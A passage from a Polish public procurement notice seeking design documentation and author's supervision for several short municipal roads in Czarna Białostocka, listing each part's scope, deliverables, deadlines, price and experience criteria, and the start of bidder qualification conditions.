umowy.<br/>Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu i uniemożliwiające wykonanie przebudowy drogi. Drzewa przewidziane do wycinki należy ponumerować na mapie sytuacyjno-wysokościowej. Przewidzieć do wycinki zbędne zakrzaczenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając w ramach poszczególnych kryteriów oceny ofert.<br/>Zamawiający informuje, iż ocena ofert będzie dokonana przez Zamawiającego oddzielnie dla każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2:	Opracowanie dokumentacji projektowej drogi gminnej między ul. Torową i ul. Sienkiewicza w Czarnej Białostockiej<br/>W ramach zadania należy opracować kompleksową, wielobranżową dokumentację projektową w zakresie rozwiązania drogowego, odwodnienia, oświetlenia ulicznego, usunięcia kolizji z istniejącym uzbrojeniem występującym na trasie inwestycji wraz z pełnieniem nadzoru autorskiego w czasie realizacji robót budowlanych. Długość projektowanej ulicy wynosi ok. 0,16 km.<br/>W działkach przeznaczonych pod budowę znajdują się następujące urządzenia: kanalizacja sanitarna, sieć wodociągowa, linia energetyczna kablowa, sieć teletechniczna podziemna. Brak sieci kanalizacji deszczowej. Należy przewidzieć przebudowę urządzeń obcych w zakresie usunięcia kolizji z projektowanymi rozwiązaniami w przypadku ich występowania. Zakres przełożenia urządzeń obcych uzgodnić z Zamawiającym. Należy w miarę możliwości dążyć do zminimalizowania kosztów. Projekty branżowe należy uzgodnić z gestorami sieci. Zamawiający nie wyklucza występowania innej infrastruktury technicznej, niż wymieniona wyżej. W przypadku stwierdzenia występowania kolizji z innymi urządzeniami/infrastrukturą techniczną, Wykonawca dokumentacji projektowej zobowiązany jest do opracowania, w ramach niniejszego zamówienia, projektów wykonawczych branżowych w zakresie niezbędnym do opracowania kompletnego projektu budowlanego.<br/>Do obowiązku Wykonawcy dokumentacji projektowej należy uzyskanie warunków technicznych od gestorów sieci na usunięcie kolizji/zabezpieczenie istniejącej infrastruktury technicznej/urządzeń.<br/>Szerokość pasa drogowego w liniach rozgraniczających wynosi ok. 4,00 m – 5,00 m. Szerokość projektowanych dróg musi być spójna z szerokością wynikającą z ewidencji gruntów i budynków oraz zapisami sporządzanego miejscowego planu zagospodarowania przestrzennego rejonu ulic Sienkiewicza, Torowej i Piłsudskiego w Czarnej Białostockiej (przewiduje się konieczność regulacji szerokości pasa drogowego poprzez podziały działek).<br/>Jednostka projektowa zobowiązana jest do opracowania wielobranżowej, kompleksowej dokumentacji projektowej w stadium projektu budowlano - wykonawczego z decyzjami oraz ze wszystkimi opiniami, uzgodnieniami, pozwoleniami i innymi dokumentami wymaganymi przepisami wraz z uzyskaniem prawomocnej decyzji pozwolenia na budowę. Projekt należy opracować zgodnie z art. 20 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2024 r., poz. 725 t. j.) oraz rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022 r., poz. 1518).<br/>Wykonawca sporządzi dokumentację na przebudowę lub budowę infrastruktury technicznej w przypadku wystąpienia kolizji z projektowaną drogą.<br/>Dokumentacja winna zawierać:<br/>1)	projekt budowlany – 3 egz.,<br/>2)	projekt techniczny drogowy – 2 egz.,<br/>3)	projekt techniczny odwodnienia ulicy – 2 egz.,<br/>4)	projekt techniczny przebudowy sieci wodociągowej – 2 egz. (o ile zajdzie taka konieczność),<br/>5)	projekt techniczny przebudowy branży telekomunikacyjnej – 2 egz. (o ile zajdzie taka konieczność),<br/>6)	projekt techniczny branży elektrycznej – 2 egz. (o ile zajdzie taka konieczność),<br/>7)	zatwierdzony projekt stałej organizacji ruchu – 2 egz.,<br/>8)	specyfikacje techniczne wykonania i odbioru robót - poszczególnych branż – po 2 egz.,<br/>9)	przedmiar robót dla poszczególnych branż – 1 egz.,<br/>10)	kosztorys inwestorski dla poszczególnych branż - 1 egz.,<br/>11)	badania geotechniczne - 2 egz. Wiercenia powinny być tak lokalizowane, aby zweryfikować możliwość wystąpienia gruntów organicznych w obniżeniach terenowych. Na odcinkach występowania gruntów organicznych niezbędne jest ustalenie zasięgu przestrzennego tych warstw i granic występowania na mapie (w tym celu odległości między otworami należy lokalizować nie rzadziej jak 30-40 m).<br/>12)	operaty wodnoprawne wg aktualnie obowiązujących przepisów – 2 egz.,<br/>13)	plan wycinki drzew i krzewów z ewentualnym projektem zieleni – 2 egz.,<br/>Dodatkowo, w przypadku braku wolnych zasobów w istniejących kanalizacjach teletechnicznych bądź możliwością zlokalizowania kanału w istniejących granicach pasa drogowego, należy opracować projekt kanału technologicznego z częścią przedmiarowo-kosztorysową i ST lub uzyskać zgodę Ministra Cyfryzacji w formie decyzji administracyjnej, zwalniającej zarządcę drogi z obowiązku budowy kanału technologicznego w ramach realizacji przedmiotowej inwestycji.<br/>Ww. dokumentację projektową należy również stworzyć w 1 egz. w wersji elektronicznej w plikach PDF i ath (w tym kosztorysy i przedmiary robót) zapisanej na nośniku CD lub USB pendrive.<br/>Ulicę oznaczoną w sporządzanym MPZP symbolem 1KR (dł. ok. 0,14 km) zaprojektować jako ciąg pieszo-jezdny o nawierzchni z kostki brukowej szarej o szerokości zgodnej z zapisami MPZP. Zjazdy z kostki brukowej czerwonej. Początek i koniec drogi należy dowiązać do istniejących dróg powiatowych nr 2300B ul. Torowej oraz 2302B ul. Sienkiewicza. Jeśli zajdzie taka potrzeba, w ramach opracowania należy uwzględnić projekt przebudowy skrzyżowań z w/w drogami powiatowymi.<br/>Na działce nr 1059/36 na obszarze oznaczonym w MPZP symbolem 1KR-KOP zaprojektować teren utwardzony parkingu po obu stronach drogi 1KR, który skomunikować z drogą powiatową - ul. Torową - dwoma zjazdami po obu stronach zatoki postojowej.<br/>Ulicę oznaczoną symbolem 3KR (dł. ok. 0,02 km) zaprojektować jako ciąg pieszo-jezdny o nawierzchni z kostki brukowej szarej na całej szerokości.<br/>Szerokość projektowanych zjazdów do nieruchomości zabudowanych dostosować do istniejących bram wjazdowych. W pozostałych przypadkach – zaprojektować zjazdy normatywne.<br/>Projektowane odwodnienie ciągów komunikacyjnych i terenów przyległych wg propozycji jednostki projektowej uzgodnionej z Zamawiającym. <br/>W ulicy zaprojektować linię energetyczną oświetleniową kablową.<br/>Zamawiający upoważni Wykonawcę do występowania w jego imieniu do innych organów o uzyskanie niezbędnych opinii i uzgodnień.<br/>Zakres zamówienia obejmuje również pełnienie funkcji nadzoru autorskiego w trakcie realizacji robót budowlanych oraz koszt aktualizacji kosztorysów inwestorskich, na życzenie Zamawiającego, co 6 miesięcy w okresie 3 lat od daty wykonania przedmiotu zamówienia.<br/>Szczegółowe rozwiązania, dotyczące m.in. urządzeń bezpieczeństwa ruchu (wyniesione skrzyżowania, progi zwalniające itp.), zostaną ustalone pomiędzy Zamawiającym i Wykonawcą na etapie projektowania. Wykonawca przedłoży również koncepcję przebudowy do zatwierdzenia przez Zamawiającego w terminie 6 tygodni od podpisania umowy.<br/>Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu i uniemożliwiające wykonanie przebudowy drogi. Drzewa przewidziane do wycinki należy ponumerować na mapie sytuacyjno-wysokościowej. Przewidzieć do wycinki zbędne zakrzaczenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając w ramach poszczególnych kryteriów oceny ofert.<br/>Zamawiający informuje, iż ocena ofert będzie dokonana przez Zamawiającego oddzielnie dla każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3:	Opracowanie dokumentacji projektowej drogi gminnej między ul. Sienkiewicza i ul. Prusa w Czarnej Białostockiej<br/>W ramach zadania należy opracować kompleksową, wielobranżową dokumentację projektową w zakresie rozwiązania drogowego, odwodnienia, usunięcia kolizji z istniejącym uzbrojeniem występującym na trasie inwestycji wraz z pełnieniem nadzoru autorskiego w czasie realizacji robót budowlanych. Długość projektowanej ulicy: około 0,05 km.<br/>W projektowanej ulicy znajdują się następujące urządzenia: sieć wodociągowa, linia energetyczna, sieć teletechniczna podziemna. Brak sieci kanalizacji deszczowej. Należy przewidzieć przebudowę urządzeń obcych w zakresie usunięcia kolizji z projektowanymi rozwiązaniami w przypadku ich występowania. Zakres przełożenia urządzeń obcych uzgodnić z Zamawiającym. Należy w miarę możliwości dążyć do zminimalizowania kosztów. Projekty branżowe należy uzgodnić z gestorami sieci. Zamawiający nie wyklucza występowania innej infrastruktury technicznej, niż wymieniona wyżej. W przypadku stwierdzenia występowania kolizji z innymi urządzeniami/infrastrukturą techniczną, Wykonawca dokumentacji projektowej zobowiązany jest do opracowania, w ramach niniejszego zamówienia, projektów wykonawczych branżowych w zakresie niezbędnym do opracowania kompletnego projektu budowlanego.<br/>Do obowiązku Wykonawcy dokumentacji projektowej należy uzyskanie warunków technicznych od gestorów sieci na usunięcie kolizji/zabezpieczenie istniejącej infrastruktury technicznej/urządzeń.<br/>Projektowana droga nie posiada wydzielonego pasa drogowego, zachodzi zatem konieczność podziału gruntów przy uwzględnieniu minimalnej ilości miejsca potrzebnego do realizacji inwestycji.<br/>Jednostka projektowa wykona we własnym zakresie mapę do celów projektowych, sporządzi dokumentację niezbędną do wydania decyzji na realizację inwestycji w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2024 r. poz. 311 t. j.) w tym przygotowanie wniosków do poszczególnych organów o wydanie opinii przewidzianych ustawą, pozwolenia wodnoprawnego i zezwolenia na wycinkę drzew. Wykonawca ma obowiązek przygotowania niezbędnej dokumentacji wymaganej prawem do opinii o które występuje zarządca drogi do innych organów.<br/>Na potrzeby budowy ulicy jednostka projektowa dokona podziałów geodezyjnych i sporządzi dokumentację geodezyjno - kartograficzną do wprowadzenia zmian w operacie ewidencji gruntów. Zamawiający przewiduje podział ok. 2 działek.<br/>Wykonawca sporządzi dokumentację na przebudowę lub budowę infrastruktury technicznej w przypadku wystąpienia kolizji z projektowaną drogą.<br/>Dokumentacja winna zawierać:<br/>1)	projekt budowlany – 4 egz. (2 egz. dla Zamawiającego),<br/>2)	projekt techniczny drogowy – 2 egz.,<br/>3)	projekt techniczny odwodnienia ulicy – 2 egz., <br/>4)	projekt techniczny przebudowy sieci wodociągowej – 2 egz. (o ile zajdzie taka konieczność),<br/>5)	projekt techniczny branży telekomunikacyjnej – 2 egz. (o ile zajdzie taka konieczność),<br/>6)	projekt techniczny branży elektrycznej – 2 egz.,<br/>7)	zatwierdzony projekt stałej organizacji ruchu – 3 egz.,<br/>8)	specyfikacje techniczne wykonania i odbioru robót - poszczególnych branż – po 2 egz.,<br/>9)	przedmiar robót dla poszczególnych branż – 1 egz.,<br/>10)	kosztorys inwestorski dla poszczególnych branż - 1 egz.,<br/>11)	badania geotechniczne - 2 egz.<br/>12)	operaty wodnoprawne wg aktualnie obowiązujących przepisów – 2 egz.,<br/>13)	plan wycinki drzew i krzewów z ewentualnym projektem zieleni – 2 egz.,<br/>14)	projekt kanału technologicznego – 2 egz. (w przypadku konieczności opracowania).<br/>W przypadku braku wolnych zasobów w istniejących kanalizacjach teletechnicznych, należy opracować projekt kanału technologicznego z częścią przedmiarowo-kosztorysową i ST lub uzyskać zgodę Ministra Cyfryzacji w formie decyzji administracyjnej, zwalniającej zarządcę drogi z obowiązku budowy kanału technologicznego w ramach realizacji przedmiotowej inwestycji.<br/>Jednostka projektowa zobowiązana jest do opracowania wielobranżowej kompleksowej dokumentacji projektowej w stadium projektu budowlano - wykonawczego wraz z dokumentacją geodezyjno-prawną, decyzjami oraz z wszystkimi uzgodnieniami i opiniami, warunkami, umożliwiającymi uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej (decyzja ZRID) w trybie Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2024 r. poz. 311 t. j.) oraz rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022 r., poz. 1518), wraz z uzyskaniem wymaganych opinii do wniosku, jego przygotowaniem ze stosownymi dokumentami oraz uzyskaniem ostatecznej decyzji na realizację inwestycji drogowej.<br/>Ww. dokumentację projektową należy również stworzyć w 1 egz. w wersji elektronicznej w plikach PDF i ath (w tym kosztorysy i przedmiary robót) zapisanej na nośniku CD lub USB pendrive.<br/>Parametry projektowanej ulicy (dł. ok. 0,05 km): dwukierunkowa jezdnia z kostki brukowej szarej o szerokości 5,00 m, chodnik jednostronny z kostki brukowej szarej minimalnej dopuszczalnej szerokości.<br/>Odwodnienie wg propozycji jednostki projektowej uzgodnionej z Zamawiającym. Zaprojektowany system powinien zapewnić skuteczny sposób odwodnienia pasa drogowego.<br/>W ramach zadania należy zaprojektować oświetlenie uliczne (1 słup oświetlenia z linią kablową) oraz przewidzieć przebudowę istniejącego słupa energetycznego zlokalizowanego na wlocie projektowanej drogi, w pasie publicznej drogi powiatowej nr 2302B – ul. Sienkiewicza.<br/>Zamawiający upoważni Wykonawcę do występowania w jego imieniu do innych organów o uzyskanie niezbędnych opinii i uzgodnień.<br/>Zakres zamówienia obejmuje również pełnienie funkcji nadzoru autorskiego w trakcie realizacji robót budowlanych oraz koszt aktualizacji kosztorysów inwestorskich, na życzenie Zamawiającego, co 6 miesięcy w okresie 3 lat od daty wykonania przedmiotu zamówienia.<br/>Wykonawca przedłoży również koncepcję przebudowy do zatwierdzenia przez Zamawiającego w terminie 6 tygodni od podpisania umowy.<br/>Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu i uniemożliwiające wykonanie przebudowy drogi. Drzewa przewidziane do wycinki należy ponumerować na mapie sytuacyjno-wysokościowej. Przewidzieć do wycinki zbędne zakrzaczenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając w ramach poszczególnych kryteriów oceny ofert.<br/>Zamawiający informuje, iż ocena ofert będzie dokonana przez Zamawiającego oddzielnie dla każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4:	Opracowanie dokumentacji projektowej ul. Spokojnej w Czarnej Białostockiej <br/>W ramach zadania należy opracować kompleksową, wielobranżową dokumentację projektową w zakresie rozwiązania drogowego, odwodnienia, usunięcia kolizji z istniejącym uzbrojeniem występującym na trasie inwestycji wraz z pełnieniem nadzoru autorskiego w czasie realizacji robót budowlanych. Długość projektowanej ulicy wynosi ok. 0,10 km.<br/>W działce przeznaczonej pod budowę znajdują się następujące urządzenia: kanalizacja sanitarna, sieć wodociągowa, linia energetyczna kablowa – w tym linia oświetlenia ulicznego, sieć teletechniczna podziemna. Brak sieci kanalizacji deszczowej. Należy przewidzieć przebudowę urządzeń obcych w zakresie usunięcia kolizji z projektowanymi rozwiązaniami w przypadku ich występowania. Zakres przełożenia urządzeń obcych uzgodnić z Zamawiającym. Należy w miarę możliwości dążyć do zminimalizowania kosztów. Projekty branżowe należy uzgodnić z gestorami sieci. Zamawiający nie wyklucza występowania innej infrastruktury technicznej, niż wymieniona wyżej. W przypadku stwierdzenia występowania kolizji z innymi urządzeniami/infrastrukturą techniczną, Wykonawca dokumentacji projektowej zobowiązany jest do opracowania, w ramach niniejszego zamówienia, projektów wykonawczych branżowych w zakresie niezbędnym do opracowania kompletnego projektu budowlanego.<br/>Do obowiązku Wykonawcy dokumentacji projektowej należy uzyskanie warunków technicznych od gestorów sieci na usunięcie kolizji/zabezpieczenie istniejącej infrastruktury technicznej/urządzeń.<br/>Szerokość pasa drogowego w liniach rozgraniczających wynosi ok. 6,00 m – 13,00 m. Szerokość projektowanej drogi musi być spójna z szerokością wynikającą z ewidencji gruntów i budynków, nie przewiduje się konieczności regulacji szerokości pasa drogowego poprzez podziały działek.<br/>Jednostka projektowa zobowiązana jest do opracowania wielobranżowej, kompleksowej dokumentacji projektowej w stadium projektu budowlano - wykonawczego z decyzjami oraz ze wszystkimi opiniami, uzgodnieniami, pozwoleniami i innymi dokumentami wymaganymi przepisami wraz z uzyskaniem prawomocnej decyzji pozwolenia na budowę. Projekt należy opracować zgodnie z art. 20 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2024 r., poz. 725 t. j.) oraz rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022 r., poz. 1518).<br/>Wykonawca sporządzi dokumentację na przebudowę lub budowę infrastruktury technicznej w przypadku wystąpienia kolizji z projektowaną drogą.<br/>Dokumentacja winna zawierać:<br/>1)	projekt budowlany – 3 egz.,<br/>2)	projekt techniczny drogowy – 2 egz.,<br/>3)	projekt techniczny odwodnienia ulicy – 2 egz.,<br/>4)	projekt techniczny przebudowy sieci wodociągowej – 2 egz. (o ile zajdzie taka konieczność),<br/>5)	projekt techniczny przebudowy branży telekomunikacyjnej – 2 egz. (o ile zajdzie taka konieczność),<br/>6)	projekt techniczny branży elektrycznej – 2 egz. (o ile zajdzie taka konieczność),<br/>7)	zatwierdzony projekt stałej organizacji ruchu – 2 egz.,<br/>8)	specyfikacje techniczne wykonania i odbioru robót - poszczególnych branż – po 2 egz.,<br/>9)	przedmiar robót dla poszczególnych branż – 1 egz.,<br/>10)	kosztorys inwestorski dla poszczególnych branż - 1 egz.,<br/>11)	badania geotechniczne - 2 egz. Wiercenia powinny być tak lokalizowane, aby zweryfikować możliwość wystąpienia gruntów organicznych w obniżeniach terenowych. Na odcinkach występowania gruntów organicznych niezbędne jest ustalenie zasięgu przestrzennego tych warstw i granic występowania na mapie (w tym celu odległości między otworami należy lokalizować nie rzadziej jak 30-40 m).<br/>12)	operaty wodnoprawne wg aktualnie obowiązujących przepisów – 2 egz.,<br/>13)	plan wycinki drzew i krzewów z ewentualnym projektem zieleni – 2 egz.,<br/>Dodatkowo, w przypadku braku wolnych zasobów w istniejących kanalizacjach teletechnicznych bądź możliwością zlokalizowania kanału w istniejących granicach pasa drogowego, należy opracować projekt kanału technologicznego z częścią przedmiarowo-kosztorysową i ST lub uzyskać zgodę Ministra Cyfryzacji w formie decyzji administracyjnej, zwalniającej zarządcę drogi z obowiązku budowy kanału technologicznego w ramach realizacji przedmiotowej inwestycji.<br/>Ww. dokumentację projektową należy również stworzyć w 1 egz. w wersji elektronicznej w plikach PDF i ath (w tym kosztorysy i przedmiary robót) zapisanej na nośniku CD lub USB pendrive.<br/>Ulicę Spokojną o długości ok. 0,10 km należy zaprojektować z kostki brukowej szarej. Utwardzenie wykonać na całej szerokości pasa drogowego. Zjazdy z kostki brukowej betonowej czerwonej o szerokości dostosowanej do istniejących bram wjazdowych nieruchomości zabudowanych. W pozostałych przypadkach – zaprojektować zjazdy normatywne.<br/>Projektowane odwodnienie ciągów komunikacyjnych i terenów przyległych wg propozycji jednostki projektowej uzgodnionej z Zamawiającym. <br/>Zamawiający upoważni Wykonawcę do występowania w jego imieniu do innych organów o uzyskanie niezbędnych opinii i uzgodnień.<br/>Zakres zamówienia obejmuje również pełnienie funkcji nadzoru autorskiego w trakcie realizacji robót budowlanych oraz koszt aktualizacji kosztorysów inwestorskich, na życzenie Zamawiającego, co 6 miesięcy w okresie 3 lat od daty wykonania przedmiotu zamówienia.<br/>Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu i uniemożliwiające wykonanie przebudowy drogi. Drzewa przewidziane do wycinki należy ponumerować na mapie sytuacyjno-wysokościowej. Przewidzieć do wycinki zbędne zakrzaczenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając w ramach poszczególnych kryteriów oceny ofert.<br/>Zamawiający informuje, iż ocena ofert będzie dokonana przez Zamawiającego oddzielnie dla każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają niżej określone przez Zamawiającego warunki udziału w postępowaniu: <br/>1) W zakresie kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.<br/>2) W zakresie sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.<br/>3) W zakresie zdolności technicznej lub zawodowej <br/>a)	w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonali należycie co najmniej dwa zamówienia:<br/>o	dla Części 1 – polegające na realizacji projektów dokumentacji drogowych w trybie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2024 r., poz. 725 t.j.) oraz rozporządzenia Ministra Infrastruktury z dnia 24.06.2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022, poz. 1518) lub projektów dokumentacji drogowych w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2024 r. poz. 311 t. j.),<br/>o	dla Części 2 – polegające na realizacji projektów dokumentacji drogowych w trybie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2024 r., poz. 725 t.j.) oraz rozporządzenia Ministra Infrastruktury z dnia 24.06.2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022, poz. 1518) lub projektów dokumentacji drogowych w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2024 r. poz. 311 